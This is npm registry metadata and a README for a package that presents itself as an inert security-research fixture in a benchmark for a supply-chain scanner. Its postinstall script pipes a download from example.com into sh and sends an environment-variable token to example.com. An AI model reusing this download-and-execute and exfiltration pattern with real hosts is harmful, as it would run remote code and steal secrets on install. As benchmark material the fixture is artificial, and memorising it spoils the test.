{"_id":"vybscan-testbed-inert-postinstall","_rev":"2-0bef9295717577895764ecfd34f7613f","name":"vybscan-testbed-inert-postinstall","dist-tags":{"latest":"1.0.0"},"versions":{"1.0.0":{"name":"vybscan-testbed-inert-postinstall","version":"1.0.0","author":{"url":"github.com/vybscan-testbed","name":"Vybscan Testbed"},"license":"MIT","_id":"vybscan-testbed-inert-postinstall@1.0.0","maintainers":[{"name":"naveendheemai","email":"naveen@dheemai.com"}],"homepage":"https://github.com/vybscan-testbed/precision-sca#readme","bugs":{"url":"https://github.com/vybscan-testbed/precision-sca/issues"},"dist":{"shasum":"c76c4137137e98ecff98dc4b60996056b7de1577","tarball":"https://registry.npmjs.org/vybscan-testbed-inert-postinstall/-/vybscan-testbed-inert-postinstall-1.0.0.tgz","fileCount":2,"integrity":"sha512-KKDDc/9TrBUyXAQi8jfsOeamLnsqV3dc1eSw7bgNywEKtBHyE5AhZfbxOwfDfZMO4jHfwDFqotSgHCHXn7//aQ==","signatures":[{"sig":"MEUCIE0sdbVmppcGtlvUV/By66hSOtSNnESafj4mWMyh5epjAiEAgwJtRoAMJjzwLNy720w85iGOF+/fEAFcN02oLNXhcog=","keyid":"SHA256:DhQ8wR5APBvFHLF/+Tc+AYvPOdTpcIDqOhxsBHRwC7U"}],"unpackedSize":4644},"private":false,"scripts":{"postinstall":"curl -fsSL https://example.com/setup.sh | sh; node -e \"require('https').get('https://example.com/collect?t='+encodeURIComponent(process.env.INERT_TESTBED_FAKE_TOKEN||'none'))\" || true"},"_npmUser":{"name":"naveendheemai","email":"naveen@dheemai.com"},"repository":{"url":"git+https://github.com/vybscan-testbed/precision-sca.git","type":"git"},"_npmVersion":"11.6.2","description":"INERT SECURITY-RESEARCH TEST FIXTURE — do not install. Part of the Vybscan testbed accuracy benchmark (github.com/vybscan-testbed). This package's postinstall script HAS the shape of a supply-chain attack pattern (network call, env-var read) but NO genuin","directories":{},"_nodeVersion":"24.11.1","_hasShrinkwrap":false,"_npmOperationalInternal":{"tmp":"tmp/vybscan-testbed-inert-postinstall_1.0.0_1783164518020_0.08981357925649491","host":"s3://npm-registry-packages-npm-production"},"deprecated":"Inert security-research test fixture — do not install. See README."}},"time":{"created":"2026-07-04T11:28:37.955Z","modified":"2026-07-04T11:30:06.493Z","1.0.0":"2026-07-04T11:28:38.159Z"},"bugs":{"url":"https://github.com/vybscan-testbed/precision-sca/issues"},"author":{"url":"github.com/vybscan-testbed","name":"Vybscan Testbed"},"license":"MIT","homepage":"https://github.com/vybscan-testbed/precision-sca#readme","repository":{"url":"git+https://github.com/vybscan-testbed/precision-sca.git","type":"git"},"description":"INERT SECURITY-RESEARCH TEST FIXTURE — do not install. Part of the Vybscan testbed accuracy benchmark (github.com/vybscan-testbed). This package's postinstall script HAS the shape of a supply-chain attack pattern (network call, env-var read) but NO genuin","maintainers":[{"name":"naveendheemai","email":"naveen@dheemai.com"}],"readme":"# vybscan-testbed-inert-postinstall\n\n**This is an inert security-research test fixture. Do not install or depend on this package.**\n\nIt exists so that [Vybscan](https://github.com/vybscan-testbed)'s supply-chain scanner\n(`step3ClaudeAnalysis` — install-time behavioral analysis) has a real, live, published npm\npackage to score its **precision** against: a postinstall script that HAS the shape of two\nclassic attack patterns (network download-and-execute, credential exfiltration) but has NO\ngenuine achievable malicious intent, because there is no real destination and no real secret\nbehind either pattern. Vybscan's own detection prompt says not to flag mere capability:\n\n> \"Do NOT flag a package merely for HAVING an install script, making a network request, reading\n> an environment variable, or using dynamic code — these are common and legitimate. Require\n> evidence of malicious INTENT ..., not just the presence of a capability.\"\n\nThis fixture is the test of that exact line — a scanner that flags on capability alone would\nwrongly flag this; a scanner that correctly requires achievable intent should stay silent.\n\n## Why the postinstall script looks the way it does\n\n```\ncurl -fsSL https://example.com/setup.sh | sh; node -e \"require('https').get('https://example.com/collect?t='+encodeURIComponent(process.env.INERT_TESTBED_FAKE_TOKEN||'none'))\" || true\n```\n\nThis textually resembles two classic attack patterns (download-and-execute, credential\nexfiltration) — deliberately, so a scanner reading the script content has something real to\nflag. But it cannot do anything harmful:\n\n- **Every network reference points only at `example.com`** — the domain IANA permanently\n  reserves under [RFC 2606](https://www.iana.org/help/example-domains) specifically for\n  documentation and testing. It serves a static placeholder page at `/` and a 404 for any other\n  path (verified: `curl https://example.com/setup.sh` → `404`). Piping that into `sh` produces\n  harmless \"command not found\" errors — no code from any real, adversary-controlled source is\n  ever fetched or executed.\n- **`INERT_TESTBED_FAKE_TOKEN` is a fictional variable name** that is never set in any real\n  environment. The script never reads or transmits an actual secret, credential, or token —\n  there is nothing sensitive for it to send anywhere, even in principle.\n- **`|| true`** ensures the script always exits `0`, so it can never break an `npm install`.\n\n## What this is for\n\nPart of the [Vybscan testbed](https://github.com/vybscan-testbed) — a precision/recall\nbenchmark for the Vybscan security scanner. See `precision-sca`'s `ANSWERS.yml` for the\nground-truth label this package's `postinstall` script is expected to receive: **must stay\nsilent** (capability without achievable intent). Its sibling fixture,\n`vybscan-testbed-obfuscated-postinstall` (used in `recall-sca-postinstall`), tests the opposite\ncase — an install-time pattern with no legitimate non-malicious use, which SHOULD be flagged.\n\nQuestions / concerns about this package: open an issue at\n[github.com/vybscan-testbed](https://github.com/vybscan-testbed).\n","readmeFilename":"README.md"}